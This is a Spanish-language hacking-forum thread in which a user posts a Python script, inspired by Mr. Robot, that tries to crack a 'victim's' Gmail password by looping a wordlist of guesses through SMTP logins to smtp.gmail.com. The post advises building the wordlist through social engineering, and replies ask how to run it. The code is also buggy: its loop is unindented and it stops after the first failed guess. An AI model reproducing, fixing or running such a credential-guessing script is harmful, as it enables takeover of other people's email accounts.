elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Cracking de gmail con python
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Cracking de gmail con python  (Leído 4,766 veces)
TheIllusionist

Desconectado Desconectado

Mensajes: 91


La información es poder


Ver Perfil
Cracking de gmail con python
« en: 9 Abril 2017, 13:20 pm »

Buenas a todos

Soy fan de la serie de MR Robot, si alguno a visto la serie Eliot usa un script para hackear los correos electronicos, así que me dió por intentar hacerlo, más o menor lo conseguí, lo malo es que tengo problemas con la conexión gmail, por lo demas bien
Aquí dejo el código:
Código
  1. #! /usr/bin/env python
  2.  
  3.  
  4. import smtplib
  5. import sys
  6. import os
  7.  
  8.  
  9. print """
  10. __________                                               .___
  11. \______   \_____    ______ ________  _  _____________  __| _/
  12. |     ___/\__  \ /  ___//  ___/\ \/ \/ /  _ \_  __ \/ __ |
  13. |    |     / __ \_\___ \ \___ \ \    (  <_> )  | \/ /_/ |
  14. |____|    (____  /____  >____  >  \/\_/ \____/|__|  \____ |
  15.                \/     \/     \/                          \/
  16. _________                       __                          
  17. \_   ___ \____________    ____ |  | __ ___________          
  18. /    \ \/\_  __ \__  \ _/ ___\|  |/ // __ \_  __ \        
  19. \    \____|  | \// __ \\  \___|    <\ ___/|  | \/          
  20. \______  /|__|  (____  /\___  >__|_ \\___  >__|            
  21.        \/            \/     \/     \/    \/          """
  22.  
  23. smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
  24. smtpserver.ehlo()
  25. smtpserver.starttls()
  26.  
  27. print "Welcome to Gmail Password Cracker"
  28. print "TRYING WITH PASSWORD IN: psw.list"
  29.  
  30. user = raw_input("Enter de victim's email addres: ")
  31. passwfile = "psw.list"
  32. passwfile = open(passwfile, "r")
  33.  
  34. for password in passwfile:
  35. try:
  36. smtpserver.login(user, password)
  37. print "Password Found: %s", password
  38. break;
  39. except smtplib.SMTPAuthenticationError:
  40. print "Unknow password"
  41. break;
  42.  
  43. sys.exit()
  44.  

Lo más raro es que gmail permita este tipo de ataques y no tenga puesto un cierto número de intentos, lo unico que tenéis que crear es un archivo llamado psw.list en la misma carpeta del script.

FUNCIONAMIENTO
Este Script funciona con ingeniería social, sacamos información de la víctima ponemos las posibles claves en el archivo, y ya está p0nemos el correo en el script y se acabó


En línea

La maquina más segura es la que esta apagada y encerrada en una caja fuerte

La sociedad no esta preparada para la actualidad
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Cracking de gmail con python
« Respuesta #1 en: 9 Abril 2017, 13:55 pm »

cuantos intentos fallidos has probado?


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
TheIllusionist

Desconectado Desconectado

Mensajes: 91


La información es poder


Ver Perfil
Re: Cracking de gmail con python
« Respuesta #2 en: 11 Abril 2017, 23:29 pm »

cuantos intentos fallidos has probado?
No entiendo muy bien a que te refieres, si es a haber hackeado un correo ajeno, no lo e intentado
pero si uno propio, claro e puesto la contraseña en el diccionario,
Si es al funcionamiento del script, Da errores al intentar hacer la conexión al gmail en diferentes ordenadores
En línea

La maquina más segura es la que esta apagada y encerrada en una caja fuerte

La sociedad no esta preparada para la actualidad
<Trocutor>

Desconectado Desconectado

Mensajes: 72


Ver Perfil
Re: Cracking de gmail con python
« Respuesta #3 en: 12 Junio 2017, 22:56 pm »

Hola buenas, he estado intentando probar con mi propio correo y he puesto 5 contraseñas en el archivo 1 de ellas era la correcta, el caso esque no se como funciona al iniciar el script.


Si me puedes enviar un mensaje privado explicandome como funciona...


GRACIAS!!!!
Alguien podria ayudarme?
« Última modificación: 13 Junio 2017, 17:56 pm por engel lex » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
TRAINING: Introducción al Cracking & Anti-Cracking
Ingeniería Inversa
MCKSys Argentina 5 6,065 Último mensaje 19 Agosto 2010, 20:24 pm
por Debci
TRAINING: Introducción al Cracking & Anti-Cracking
Seguridad
MCKSys Argentina 0 4,544 Último mensaje 19 Agosto 2010, 00:08 am
por MCKSys Argentina
Envía mensajes cifrados y seguros desde Gmail con Secure Gmail
Noticias
wolfbcn 0 1,937 Último mensaje 17 Julio 2013, 21:53 pm
por wolfbcn
Error al hacer conexión con gmail | Python
Scripting
TheIllusionist 1 2,361 Último mensaje 18 Junio 2017, 01:43 am
por <Trocutor>
[Python] Crackear gmail con script
Scripting
<Trocutor> 7 4,448 Último mensaje 14 Junio 2017, 18:00 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines